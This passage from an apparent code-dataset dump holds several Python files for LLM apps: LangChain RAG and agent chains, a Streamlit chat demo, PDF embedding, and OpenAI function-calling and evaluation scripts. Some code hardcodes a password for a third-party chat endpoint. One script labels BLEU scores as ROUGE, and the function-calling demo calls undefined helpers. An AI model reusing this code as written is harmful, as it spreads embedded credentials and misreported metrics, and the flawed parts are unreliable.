"input": lambda x: x["input"],
"agent_scratchpad": lambda x: format_to_openai_tool_messages(
x["intermediate_steps"]
),
"chat_history": lambda x: _format_chat_history(x["chat_history"]),
}
| prompt
| llm.bind(tools=oai_tools)
| OpenAIToolsAgentOutputParser()
)
agent_executor = AgentExecutor(agent=agent, tools=lc_tools, verbose=True, callbacks=callbacks)
return agent_executor
if __name__ == "__main__":
question_generation_chain = get_search_query_generation_chain()
print('='*50)
print('RAG Chain')
chain = get_rag_chain()
print(chain.invoke({'input': 'serverless computing', 'chat_history': []}))
print('='*50)
print('Question Generation Chain')
print(question_generation_chain.invoke({'original_query': 'serverless computing'}))
print('-'*50)
print('RAG Fusion Chain')
chain = get_rag_fusion_chain()
print(chain.invoke({'input': 'serverless computing', 'chat_history': []}))
agent_executor = get_agent_chain()
print(
agent_executor.invoke({
"input": "based on the source document, compare FaaS with BaaS??",
"chat_history": [],
})
)
| [
"original_query",
"You are a helpful assistant, use the search tool to answer the user's question and cite only the page number when you use information coming (like [p1]) from the source document.\nchat history: {chat_history}",
"{input}",
"Answer the question based only on the following context, citing the page number(s) of the document(s) you used to answer the question:\n{context}\n\nQuestion: {question}\n",
"Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question, in its original language.\n\nChat History:\n{chat_history}\nFollow Up Input: {input}\nStandalone question:",
"agent_scratchpad",
"You are a helpful assistant that generates multiple search queries based on a single input query.",
"Generate multiple search queries related to: {original_query} \n OUTPUT (4 queries):",
"Search the contents of the source document for the queries.",
"content"
] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | app-agent2.py | import streamlit as st
from langchain.agents import initialize_agent, AgentType
from langchain.callbacks import StreamlitCallbackHandler
from langchain.chat_models import ChatOpenAI
from langchain.prompts import ChatPromptTemplate, MessagesPlaceholder
from langchain.agents.format_scratchpad import format_to_openai_function_messages
from langchain.agents.output_parsers import OpenAIFunctionsAgentOutputParser
from llm_helper import get_agent_chain, get_lc_oai_tools, convert_message
from langchain.agents import AgentExecutor
with st.sidebar:
openai_api_key = st.secrets["OPENAI_API_KEY"]
"[Get an OpenAI API key](https://platform.openai.com/account/api-keys)"
"[View the source code](https://github.com/streamlit/llm-examples/blob/main/pages/2_Chat_with_search.py)"
"[](https://codespaces.new/streamlit/llm-examples?quickstart=1)"
st.title("🔎 LangChain - Chat with search")
"""
In this example, we're using `StreamlitCallbackHandler` to display the thoughts and actions of an agent in an interactive Streamlit app.
Try more LangChain 🤝 Streamlit Agent examples at [github.com/langchain-ai/streamlit-agent](https://github.com/langchain-ai/streamlit-agent).
"""
if "messages" not in st.session_state:
st.session_state["messages"] = [
{"role": "assistant", "content": "Hi, I'm a chatbot who can search the web. How can I help you?"}
]
for msg in st.session_state.messages:
st.chat_message(msg["role"]).write(msg["content"])
if prompt := st.chat_input(placeholder="Who won the Women's U.S. Open in 2018?"):
st.session_state.messages.append({"role": "user", "content": prompt})
st.chat_message("user").write(prompt)
if not openai_api_key:
st.info("Please add your OpenAI API key to continue.")
st.stop()
if "messages" in st.session_state:
chat_history = [convert_message(m) for m in st.session_state.messages[:-1]]
else:
chat_history = []
with st.chat_message("assistant"):
st_cb = StreamlitCallbackHandler(st.container(), expand_new_thoughts=False)
agent = get_agent_chain(st_cb=st_cb)
response = agent.invoke({
"input": prompt,
"chat_history": chat_history,
})
response = response["output"]
st.session_state.messages.append({"role": "assistant", "content": response})
st.write(response)
| [
"Hi, I'm a chatbot who can search the web. How can I help you?"
] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | embed_pdf.py | from langchain.document_loaders import PagedPDFSplitter
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import FAISS
import os
def embed_document(file_name, file_folder="pdf", embedding_folder="index"):
file_path = f"{file_folder}/{file_name}"
loader = PagedPDFSplitter(file_path)
source_pages = loader.load_and_split()
embedding_func = OpenAIEmbeddings()
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=500,
chunk_overlap=100,
length_function=len,
is_separator_regex=False,
separators=["\n\n", "\n", " ", ""],
)
source_chunks = text_splitter.split_documents(source_pages)
search_index = FAISS.from_documents(source_chunks, embedding_func)
search_index.save_local(
folder_path=embedding_folder, index_name=file_name + ".index"
)
def embed_all_pdf_docs():
# Define the directory path
pdf_directory = "pdf"
# Check if the directory exists
if os.path.exists(pdf_directory):
# List all PDF files in the directory
pdf_files = [
file for file in os.listdir(pdf_directory) if file.endswith(".pdf")
]
if pdf_files:
for pdf_file in pdf_files:
print(f"Embedding {pdf_file}...")
embed_document(file_name=pdf_file, file_folder=pdf_directory)
print("Done!")
else:
raise Exception("No PDF files found in the directory.")
else:
raise Exception(f"Directory '{pdf_directory}' does not exist.")
def get_all_index_files():
# Define the directory path
index_directory = "index"
# Check if the directory exists
if os.path.exists(index_directory):
# List all index files in the directory
postfix = ".index.faiss"
index_files = [
file.replace(postfix, "")
for file in os.listdir(index_directory)
if file.endswith(postfix)
]
if index_files:
return index_files
else:
raise Exception("No index files found in the directory.")
else:
raise Exception(f"Directory '{index_directory}' does not exist.")
| [] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | agent_helper.py | # from langchain.callbacks import StreamlitCallbackHandler
from langchain.callbacks.streamlit.streamlit_callback_handler import StreamlitCallbackHandler
from tenacity import retry, wait_exponential, stop_after_attempt
def bind_logger(toolClass):
class newToolClass(toolClass):
def __init__(self, tool_name: str, st_cb: StreamlitCallbackHandler, *args, **kwargs):
super().__init__(*args, **kwargs)
self.st_cb = st_cb
self.tool_name = tool_name
def run(self, *args, **kwargs):
print(f"Running {toolClass.__name__} {[*args]}, {kwargs}")
if self.st_cb._current_thought is None:
self.st_cb.on_llm_start({}, [])
args_str = ' '.join(args) + ' ' + ' '.join([f'{k}=`{v}`' for k, v in kwargs.items()])
self.st_cb.on_tool_start({'name': self.tool_name}, args_str)
try:
ret_val = retry(
wait=wait_exponential(min=2, max=20),
stop=stop_after_attempt(5),
)(super().run)(*args, **kwargs)
self.st_cb.on_tool_end(ret_val)
return ret_val
except Exception as e:
original_exception = e.last_attempt.result()
print(f"Exception {original_exception} in {toolClass.__name__} {[*args]}, {kwargs}")
raise original_exception
return newToolClass
from functools import wraps
def retry_and_streamlit_callback(st_cb: StreamlitCallbackHandler, tool_name: str):
if st_cb is None:
return lambda x: x
def decorator(tool_func):
@wraps(tool_func)
def decorated_func(*args, **kwargs):
print(f"Running {tool_name} {args}, {kwargs}")
if st_cb._current_thought is None:
st_cb.on_llm_start({}, [])
args_str = ' '.join(args) + ' ' + ' '.join([f'{k}=`{v}`' for k, v in kwargs.items()])
st_cb.on_tool_start({'name': tool_name}, args_str)
@retry(wait=wait_exponential(min=2, max=20), stop=stop_after_attempt(5))
def retry_wrapper():
return tool_func(*args, **kwargs)
try:
ret_val = retry_wrapper()
st_cb.on_tool_end(ret_val)
return ret_val
except Exception as e:
print(f"Exception {e} in {tool_name} {args}, {kwargs}")
raise e
return decorated_func
return decorator
| [] |
2024-01-10 | yangheng95/InstOptima | models~generative_summarization~chagpt.py | import os
import shutil
import warnings
from .instruction import SumInstruction
warnings.filterwarnings("ignore")
import pandas as pd
from .data_utils import read_text
def train_sum(epoch, instruction, example, **kwargs):
task_name = "generative_summarization"
experiment_name = kwargs.get("dataset")
model_checkpoint = kwargs.get("plm")
# model_checkpoint = "google/flan-t5-small"
print("Experiment Name: ", experiment_name)
model_out_path = "checkpoints"
model_out_path = os.path.join(
model_out_path,
task_name,
f"{model_checkpoint.replace('/', '')}-{experiment_name}",
)
print("Model output path: ", model_out_path)
id_train_file_path = kwargs.get("dataset")
id_test_file_path = kwargs.get("dataset")
id_tr_df = read_text(id_train_file_path, "train")
id_te_df = read_text(id_test_file_path, "test")
id_tr_df = pd.DataFrame(id_tr_df)
id_te_df = pd.DataFrame(id_te_df)
def chat(prompt, **kwargs):
params = {"prompt": None, "message_history": None, "password": "Password!"}
chatter_url = "https://chatter.pagekite.me/chat"
import requests
import time
params.update(
{
"prompt": prompt,
"system_prompt": "You are ChatGPT, a chatbot that uses the GPT-3 language model from OpenAI to answer questions about the world.",
"message_history": '[]',
"tag": "EvoPrompt-" + kwargs.get("dataset", "absa-chagpt-ablation-no-instructions"),
}
)
try:
response = requests.post(chatter_url, params=params, timeout=600)
if "error" in response.json():
print(response.json())
time.sleep(5)
return chat(prompt)
if response.status_code != 200:
print(response.status_code)
print(response.text)
time.sleep(5)
return chat(prompt)
return response.json()["response"], response.json()["message_history"]
except Exception as e:
print(e)
time.sleep(5)
return chat(prompt)
for batch in id_te_df.sample(100).to_dict(orient="records"):
reference_summaries = []
generated_summaries = []
prompt = SumInstruction().prepare_input(batch['text'])
response, _ = chat(prompt, **kwargs)
generated_summaries.append(response)
reference_summaries.append([batch['label']])
from nltk.translate.bleu_score import sentence_bleu
bleu_scores1 = []
bleu_scores2 = []
bleu_scores3 = []
for i in range(len(generated_summaries)):
bleu_scores1.append(sentence_bleu(reference_summaries[i], generated_summaries[i], weights=(1, 0, 0, 0)))
bleu_scores2.append(sentence_bleu(reference_summaries[i], generated_summaries[i], weights=(0, 1, 0, 0)))
bleu_scores3.append(sentence_bleu(reference_summaries[i], generated_summaries[i], weights=(0, 0, 1, 0)))
metrics = {
"rouge-1": sum(bleu_scores1) / len(bleu_scores1),
"rouge-2": sum(bleu_scores2) / len(bleu_scores2),
"rouge-3": sum(bleu_scores3) / len(bleu_scores3),
}
# # Compute Metrics
# metrics = t5_exp.get_metrics(id_tr_labels, id_tr_pred_labels)
# print('----------------------- Training Set Metrics -----------------------')
# print(metrics)
#
# metrics = t5_exp.get_metrics(id_te_labels, id_te_pred_labels)
# print('----------------------- Testing Set Metrics -----------------------')
# print(metrics)
# # Compute Metrics
# metrics = t5_exp.get_classic_metrics(id_tr_labels, id_tr_pred_labels)
# print("----------------------- Classic Training Set Metrics -----------------------")
# print(metrics)
print("----------------------- Classic Testing Set Metrics -----------------------")
print(metrics)
try:
shutil.rmtree("checkpoints")
except:
pass
return metrics
| [] |
2024-01-10 | yangheng95/InstOptima | models~aspect_based_sentiment_analysis~chagpt.py | import os
import shutil
import warnings
warnings.filterwarnings("ignore")
import pandas as pd
from .data_utils import read_json
def train_absa(epoch, instruction, example, **kwargs):
task_name = "aspect_based_sentiment_analysis"
experiment_name = kwargs.get("dataset")
model_checkpoint = kwargs.get("plm")
# model_checkpoint = "google/flan-t5-small"
print("Experiment Name: ", experiment_name)
model_out_path = "checkpoints"
model_out_path = os.path.join(
model_out_path,
task_name,
f"{model_checkpoint.replace('/', '')}-{experiment_name}",
)
print("Model output path: ", model_out_path)
id_train_file_path = kwargs.get("dataset")
id_test_file_path = kwargs.get("dataset")
id_tr_df = read_json(id_train_file_path, "train")
id_te_df = read_json(id_test_file_path, "test")
id_tr_df = pd.DataFrame(id_tr_df)
id_te_df = pd.DataFrame(id_te_df)
def chat(prompt, **kwargs):
params = {"prompt": None, "message_history": None, "password": "Password!"}
chatter_url = "https://chatter.pagekite.me/chat"
import requests
import time
params.update(
{
"prompt": prompt,
"system_prompt": "You are ChatGPT, a chatbot that uses the GPT-3 language model from OpenAI to answer questions about the world.",
"message_history": '[]',
"tag": "EvoPrompt-" + kwargs.get("dataset", "absa-chagpt-ablation-no-instructions"),
}
)
try:
response = requests.post(chatter_url, params=params, timeout=600)
if "error" in response.json():
print(response.json())
time.sleep(5)
return chat(prompt)
if response.status_code != 200:
print(response.status_code)
print(response.text)
time.sleep(5)
return chat(prompt)
return response.json()["response"], response.json()["message_history"]
except Exception as e:
print(e)
time.sleep(5)
return chat(prompt)
num_total = 0
num_acc = 0
for batch in id_te_df.sample(100).to_dict(orient="records"):
print(batch)
print(batch['text'])
print(batch['labels'])
for label in batch['labels']:
if label['aspect'] != 'NULL':
prompt = f"{instruction}\n Examples: {example}\n what is the sentiment for {label['aspect']} in the following text: {batch['text']}?\n\n"
response, _ = chat(prompt, **kwargs)
print(response)
if label['polarity'].lower() in response.lower():
num_acc += 1
num_total += 1
print(num_acc / num_total)
metrics = {'accuracy': num_acc / num_total}
# # Compute Metrics
# metrics = t5_exp.get_metrics(id_tr_labels, id_tr_pred_labels)
# print('----------------------- Training Set Metrics -----------------------')
# print(metrics)
#
# metrics = t5_exp.get_metrics(id_te_labels, id_te_pred_labels)
# print('----------------------- Testing Set Metrics -----------------------')
# print(metrics)
# # Compute Metrics
# metrics = t5_exp.get_classic_metrics(id_tr_labels, id_tr_pred_labels)
# print("----------------------- Classic Training Set Metrics -----------------------")
# print(metrics)
print("----------------------- Classic Testing Set Metrics -----------------------")
print(metrics)
try:
shutil.rmtree("checkpoints")
except:
pass
return metrics
| [
"PLACEHOLDER\n Examples: PLACEHOLDER\n what is the sentiment for PLACEHOLDER in the following text: PLACEHOLDER?\n\n"
] |
2024-01-10 | LandonJPGinn/resume_code_examples | projects~CreatorPipeline~_openai.py | from pathlib import Path
import openai
import requests
from CreatorPipeline.constants import PLATFORMS, PROMPTS
openai.api_key = PLATFORMS.openai.get("OPENAI_KEY")
def generate_text(prompt, output=None):
"""Generates text from a prompt using the OpenAI API."""
response = openai.Completion.create(
model="text-davinci-003", prompt=prompt, max_tokens=2000
)
if not output:
return response.choices[0].text
with open(output, "w") as f:
f.write(response.choices[0].text)
def generate_image(prompt, n, output=None):
"""Generates images from a prompt using the OpenAI API."""
response = openai.Image.create(prompt=prompt, n=n, size="1024x1024")
image_urls = response["data"][0]["url"]
if not output:
return image_urls
for i, pic in enumerate(image_urls):
pic_path = Path(f"{output}") / f"thumbnail_component_{i:04d}.png"
save_image(pic_url=pic, output=pic_path)
def transcribe_audio(fp, output=None):
"""Transcribes audio from a file using the OpenAI API."""
print(help(openai.Audio.transcribe))
with open(fp, "rb") as f:
response = openai.Audio.transcribe(model="whisper-1", file=f)
if response:
print(response)
return response
def translate_audio(file, lang="English", output=None):
"""Translates audio from a file using the OpenAI API."""
openai.Audio.translate(model="whisper-1", file=file, language=lang)
def save_image(pic_url, output):
"""Saves an image from a url to a file."""
with open(output, "wb") as handle:
response = requests.get(pic_url, stream=True)
if not response.ok:
print(response)
for block in response.iter_content(1024):
if not block:
break
handle.write(block)
# received from db
params = {
"SUBJECT": "Landing Your First Job",
"GAIN": "Know how to confidently get a first job opportunity.",
}
params = {
"SUBJECT": "",
"GAIN": "",
"TITLE": "",
"RELEASE_DATE": "",
"VIDEO1": "", # choice from options
"VIDEO2": "", # choice from options
}
# Define might need a step first to set the gain desired?
# or maybe the clarity can be suggested?
# maybe its just manual
def generate_episode_ai_content(params, episode_root=None):
"""Generates AI content for an episode."""
print("\nGenerating AI Content")
episode_root = Path(episode_root)
# to 03_script/script.txt
generate_text(
PROMPTS.script_outline.substitute(**params),
episode_root / "03_script/script.txt",
)
# to 02_research/components/thumb
generate_image(
PROMPTS.thumbnail_components.substitute(**params),
PROMPTS.thumbnail_component_count,
episode_root / "02_research/components/thumb",
)
# to 07_release/community
generate_text(
PROMPTS.community.substitute(**params),
episode_root / "07_release/community/community.txt",
)
# to 07_release/emails
generate_text(
PROMPTS.email_chain.substitute(**params),
episode_root / "07_release/emails/email_pre.txt",
)
# to 08_market/socials
generate_text(
PROMPTS.channel_article.substitute(**params),
episode_root / "08_market/socials/article.txt",
)
# to 08_market/emails
generate_text(
PROMPTS.blog_post.substitute(**params),
episode_root / "08_market/emails/emails_post.txt",
)
print("\nDone Generating AI Content\n")
def generate_closed_captions(audio_file, output=None):
"""Generates closed captions for an audio file."""
transcribe_audio(audio_file, output)
# for lang in PROMPTS.languages:
# translate_audio(audio_file, lang, output)
| [] |
2024-01-10 | LandonJPGinn/resume_code_examples | projects~CreatorPipeline~_phase_initialize.py | # Start a new episode - from an Episode listed already in the Database.
# This is not an episode idea command
import argparse
import sys
from pathlib import Path
import json
import re
from CreatorPipeline import _openai as oai
from CreatorPipeline.constants import DEFAULTS, PROMPTS, STATUS
from CreatorPipeline.directory import create_episode_directory
from CreatorPipeline.episode import Episode
from CreatorPipeline.database import ActiveEpisodeDatabase
class PhaseBuild:
"""Build out dependencies for a phase step. Currently simple, may need to be more complex later"""
def __init__(self, episode):
self.episode = [episode]
initialize_episodes(self.episode)
def initialize_episodes(episodes):
"""Initialize a episodes from the database into folders"""
selected_episodes = []
for episode in episodes:
# episode_id = episode.get("ID")
if not isinstance(episode, Episode):
current_episode = Episode(episode)
else:
current_episode = episode
if not current_episode:
print(
f"{episode} failed to find an Episode. Make sure the hash provided is in the database.\nStopping"
)
sys.exit()
selected_episodes.append(current_episode)
# confirmation block
print("You have selected the following: ")
[ep.summarize() for ep in selected_episodes]
print("\n\nContinue?")
resp = input("Y/n")
if resp.lower() != "y":
print("cancelling...")
sys.exit()
for episode in selected_episodes:
# ensure that the episode row contains values for:
"""
Keyword Phrase
Tactic
Gain
Avatar
Method
Format
Playlist
All sheet columns G:N
"""
exceptions = ("VideoID", "Thumb_Text", "next_video_id","Status")
for k, v in episode.__dict__.items():
print(f"{k}: {v}")
if k in exceptions:
continue
assert v, f"No Value found for {k}. Fill out Episode first in Sheet."
directory = create_episode_directory(episode)
print(directory)
assert directory, f"{directory} is not a valid directory"
openai_initial(episode_root=directory, episode=episode)
episode.change_status(STATUS.start)
episode.queue_up()
ActiveEpisodeDatabase().add_episode(episode.ID)
def clean_up_json(proposal_file=None):
"""Cleans up the JSON file from OpenAI to be valid JSON object for system"""
try:
with open(proposal_file, "r") as f:
data = f.readlines()
data = "".join(data)
data = re.sub(r'\s+', ' ', data)
pattern = r"\{(?:[^{}]|(.*))\}"
find_json = re.findall(pattern, data)
for json_obj in find_json:
try:
jdata = json.loads("{" + f"{json_obj}" + "}")
with open(proposal_file, "w") as f:
json.dump(jdata, f, indent=4)
except json.decoder.JSONDecodeError:
print(f"Invalid JSON Manually clean file: {proposal_file}")
except IOError as err:
print(err)
print("Error Occured while cleaning up JSON. Please check file manually.")
def openai_initial(episode_root=".", episode=None):
"""Generates the initial text ideas for an episode using OpenAI."""
episode_root = Path(episode_root).expanduser().resolve()
params = episode.__dict__
prompts = [
[
PROMPTS.proposed_episode.substitute(**params),
DEFAULTS.define_proposals,
],
[
PROMPTS.proposed_description.substitute(**params),
DEFAULTS.define_description,
],
[
PROMPTS.qotd.substitute(**params),
DEFAULTS.define_qotd,
],
[
PROMPTS.thumbnail_prompts.substitute(**params),
DEFAULTS.define_thumbnail_prompts,
],
]
for prompt, filepath in prompts:
oai.generate_text(prompt, episode_root / filepath)
clean_up_json(episode_root / DEFAULTS.define_proposals)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Initialize Episode Directory and Queue up"
)
parser.add_argument(
"episodes", type=str, nargs="+", help="push episode(s) to initialize"
)
args = parser.parse_args()
initialize_episodes(args.episodes)
"""
When I run Initialize Episode
I expect to provide it a hash value and look for the closest match, asking to confirm with a display showing details about it.
If I confirm, a directory will be generated with the correct name from a template
The meta data that was shown ( database values )
Get added to a prompt for openai to run a few generators for episode content.
The Define step is over and the status switches to research.
"""
| [] |
2024-01-10 | AnmolKiran/Sustainable-and-Trustworthy-Generative-AI | myweatherproject~myweatherapp~function.py | from openai import OpenAI
import json
from googlesearch import search
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lsa import LsaSummarizer
client = OpenAI()
def perform_search(query):
# Use the Google Search API or web scraping logic here
results = []
for j in search(query, num=5, stop=5, pause=2): # Fetching the top 5 search results
results.append({"title": "Result", "link": j, "snippet": "Description of the result."})
return results
def summarize_text(text):
parser = PlaintextParser.from_string(text, Tokenizer("english"))
summarizer = LsaSummarizer()
summary = summarizer(parser.document, 2) # 2 sentences in the summary
return ' '.join(str(sentence) for sentence in summary)
def search_function(query):
# Your search logic here
results = perform_search(query)
# Summarize each search result
for result in results:
result['summary'] = summarize_text(result['snippet'])
return json.dumps({"results": results})
def chat_function(message):
# Step 1: send the conversation and available functions to the model
messages = [{"role": "user", "content": message}]
# Step 2: make an API call to OpenAI
response = client.chat.completions.create(
model="gpt-4",
messages=[
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": "Tell me a joke."},
],
# tool_choice="auto", # auto is default, but we'll be explicit
)
# Step 3: Extract and return the assistant's reply
response_message = response.choices[0].message
return json.dumps({"response": response_message.content})
def trusted_sources_function(topic):
# Your trusted sources logic here
sources = get_trusted_sources(topic)
return json.dumps({"sources": sources})
def single_value_dashboard_function(metric):
# Your single value dashboard logic here
value = get_single_value_metric(metric)
return json.dumps({"value": value})
def chart_dashboard_function(chart_type, data):
# Your chart dashboard logic here
chart_data = generate_chart(chart_type, data)
return json.dumps({"chart_data": chart_data})
def news_dashboard_function(user_query, current_date, news_headlines):
# Generate a prompt using user query, current date, and news headlines
prompt = f"These are the latest news headlines regarding '{user_query}' on {current_date}. Give me a brief 1 paragraph summary for '{user_query}'.\nStart:\n"
for news_entry in news_headlines:
prompt += f"\n{news_entry['source']}\n{news_entry['headline']}\n{news_entry['timestamp']}\n"
# Call OpenAI API
response = client.chat.completions.create(
model="gpt-4",
messages=[
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": prompt},
],
)
# Extract and return the summary from the OpenAI response
response_message = response.choices[0].message
summary = response_message.content.strip()
return json.dumps({"summary": summary})
# Example usage:
user_query = "steel price forecast"
current_date = "11th November 2023"
news_headlines = [
{"source": "CNBC", "headline": "Goldman Sachs sees 'clear deficit' of iron ore", "timestamp": "Yesterday"},
# Add more news entries as needed
]
result = news_dashboard_function(user_query, current_date, news_headlines)
print(result)
def patents_search_function(query):
# Your patents search logic here (replace with actual implementation)
patents_data = [
{
"title": "舜平 山崎 株式会社半導体エネルギー研究所",
"priority": "2003-06-16",
"filed": "2023-08-10",
"granted": "2023-09-29",
"published": "2023-09-29",
"description": "An object of the present invention is to form an auxiliary electrode that can prevent a luminance gradient caused by a potential drop of a counter electrode from becoming visible even as the definition of a light emitting device progresses...",
},
{
"title": "シャシュア,アムノン モービルアイ ビジョン テクノロジーズ リミテッド",
"priority": "2018-03-20",
"filed": "2023-07-11",
"granted": "2023-10-23",
"published": "2023-10-23",
"description": "In the processor circuit, obtaining a planned driving behavior to achieve a navigation goal of the host vehicle; receiving sensor data from a sensor device representative of the environment surrounding the host vehicle; identifying a target vehicle moving within the environment...",
},
# Add more patent data as needed
]
# Summarize the patents related to the user query
summary_paragraph = f"These are the latest patents related to '{query}'. Summarize these patents in specific in 1 paragraph and relate them to '{query}'.\n\n"
for patent in patents_data:
summary_paragraph += f"{patent['title']} ({patent['priority']}): {patent['description']}\n\n"
# Return the summary as a JSON string
return json.dumps({"summary": summary_paragraph})
# Example dummy function hard coded to return the same weather
# In production, this could be your backend API or an external API
def get_current_weather(location, unit="fahrenheit"):
"""Get the current weather in a given location"""
if "tokyo" in location.lower():
return json.dumps({"location": "Tokyo", "temperature": "10", "unit": "celsius"})
elif "san francisco" in location.lower():
return json.dumps({"location": "San Francisco", "temperature": "72", "unit": "fahrenheit"})
elif "paris" in location.lower():
return json.dumps({"location": "Paris", "temperature": "22", "unit": "celsius"})
else:
return json.dumps({"location": location, "temperature": "unknown"})
def run_conversation():
# Step 1: send the conversation and available functions to the model
messages = [{"role": "user", "content": "What's the weather like in San Francisco, Tokyo, and Paris?"}]
tools = [
{
"type": "function",
"function": {
"name": "get_current_weather",
"description": "Get the current weather in a given location",
"parameters": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "The city and state, e.g. San Francisco, CA",
},
"unit": {"type": "string", "enum": ["celsius", "fahrenheit"]},
},
"required": ["location"],
},
},
}
]
response = client.chat.completions.create(
model="gpt-4",
messages=messages,
tools=tools,
# tool_choice="auto", # auto is default, but we'll be explicit
)
response_message = response.choices[0].message
tool_calls = response_message.tool_calls
# Step 2: check if the model wanted to call a function
if tool_calls:
# Step 3: call the function
# Note: the JSON response may not always be valid; be sure to handle errors
available_functions = {
"chat_function": chat_function,
"search_function": search_function,
"trusted_sources_function": trusted_sources_function,
"single_value_dashboard_function": single_value_dashboard_function,
"chart_dashboard_function": chart_dashboard_function,
"news_dashboard_function": news_dashboard_function,
"patents_search_function": patents_search_function,
"get_current_weather": get_current_weather,
} # only one function in this example, but you can have multiple
messages.append(response_message) # extend conversation with assistant's reply
# Step 4: send the info for each function call and function response to the model
for tool_call in tool_calls:
function_name = tool_call.function.name
function_to_call = available_functions[function_name]
function_args = json.loads(tool_call.function.arguments)
function_response = function_to_call(
location=function_args.get("location"),
unit=function_args.get("unit"),
)
messages.append(
{
"tool_call_id": tool_call.id,
"role": "tool",
"name": function_name,
"content": function_response,
}
) # extend conversation with function response
second_response = client.chat.completions.create(
model="gpt-4",
messages=messages,
) # get a new response from the model where it can see the function response
return second_response.json()
print(run_conversation()) | [
"These are the latest news headlines regarding 'PLACEHOLDER' on PLACEHOLDER. Give me a brief 1 paragraph summary for 'PLACEHOLDER'.\nStart:\n",
"Tell me a joke.",
"What's the weather like in San Francisco, Tokyo, and Paris?",
"You are a helpful assistant.",
"\nPLACEHOLDER\nPLACEHOLDER\nPLACEHOLDER\n"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.